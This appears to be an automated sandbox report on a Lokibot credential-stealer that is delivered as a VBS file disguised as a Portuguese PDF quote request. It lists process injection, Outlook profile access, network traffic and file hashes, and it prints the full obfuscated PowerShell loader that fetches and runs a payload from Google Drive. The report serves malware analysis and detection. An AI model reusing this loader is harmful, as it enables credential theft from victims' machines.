SHA256 925889eb90023a8601cf340b7416fc8153d3bcc11ce2f3ecb40b32ea6a879742
SHA512 e66b94dc0e28a8d65c402eb8def85e24b8fdda9071e1c87a002ba22c0427455e5b99c6c336108d45e177ec768576ce5ed1188fef42fa186c3b6b7836912018e0

C:\Users\Admin\AppData\Local\Temp\CabA40C.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/900-328-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-326-0x0000000000590000-0x0000000004968000-memory.dmp

memory/900-330-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-331-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-329-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-332-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-334-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1712-336-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/900-337-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-335-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-338-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-333-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-340-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-339-0x0000000000400000-0x0000000000581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/900-363-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-364-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-365-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-366-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-367-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-368-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-369-0x0000000000400000-0x0000000000581000-memory.dmp

memory/900-370-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-21 17:07

Reported

2024-03-21 17:09

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

Signatures

Lokibot

trojan spyware stealer lokibot

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4956 set thread context of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 3484 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3484 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 2948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3484 wrote to memory of 2948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 4216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 4216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 2568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 2568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4956 wrote to memory of 1088 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3180 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 33.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 8.8.8.8:53 49.61.82.140.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 8f730c551500d56834bbf653c4967bfa
SHA1 743ced63ecf36448118864ebb17326215c39a47c
SHA256 70054f0aa395f386ba7751641347c2cb5e5f730769139691324ede08b5e0792f
SHA512 7f74b3322094bad9ad169608679c299f91c4b0cafcd503d21994b8a3b1027db1994997aa0ddcee56e70a4169434c473dd3cbd7ebbc485b37de465f7799bf9ade

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 3a77b94591bc1515432be570e46a0e8c
SHA1 4abaf647d3adcd56bc7247e272b7d80dfba74dcf
SHA256 904c10020cd2ed4c085f02c125fa373f693454dce4bc7015a0bca543cdf9459d
SHA512 9bf2e8a1638283ffc19e75d4f669e734ca90de46890c38a3e28390a2ac1b8bc1cdc55c18236f5728d962dacd4fe079e31ebdc22d1f69dc8267fc6d7d7d699867

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 5c70ac32cd66791376b62c77311b502f
SHA1 de76395b2e4dc43d7de2c2b16d6c2fc708877379
